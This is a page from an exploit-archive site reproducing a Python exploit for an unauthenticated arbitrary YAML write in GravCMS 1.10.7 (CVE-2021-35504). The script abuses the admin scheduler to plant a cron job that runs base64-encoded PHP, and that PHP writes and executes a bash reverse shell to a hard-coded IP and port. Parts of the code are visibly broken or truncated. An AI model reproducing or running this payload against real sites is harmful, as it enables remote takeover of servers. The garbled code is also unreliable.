GravCMS 1.10.7 Arbitrary YAML Write / Update

CVE Category Price Severity
CVE-2021-35504 CWE-80 $5000 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2021-07-11
CVSS:4.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

GravCMS 1.10.7 Arbitrary YAML Write / Update
# Exploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)
# Original Exploit Author: Mehmet Ince 
# Vendor Homepage:
# Version: 1.10.7
# Tested on: Debian 10 
# Author: legend


import requests
import sys
import re
import base64
target= ""
#Change base64 encoded value with with below command.
#echo -ne "bash -i >& /dev/tcp/ 0>&1" | base64 -w0 
payload=b"""/*<?php /**/
file_put_contents('/tmp/',base64_decode('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMy80NDQ0IDA+JjE='));chmod('/tmp/',0755);system('bash /tmp/');
s = requests.Session()
r = s.get(target+"/admin")
adminNonce ='admin-nonce" value="(.*)"',r.text).group(1)
if adminNonce != "" :
    url = target + "/admin/tools/scheduler"
    data = "admin-nonce="+adminNonce
    data +='&task=SaveDefault&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22'+base64.b64encode(payload).decode('utf-8')+'%22%29%29%3b&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=&data%5bstatus%5d%5bncefs%5d=enabled&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append'
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r ="/admin/config/scheduler",data=data,headers=headers)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum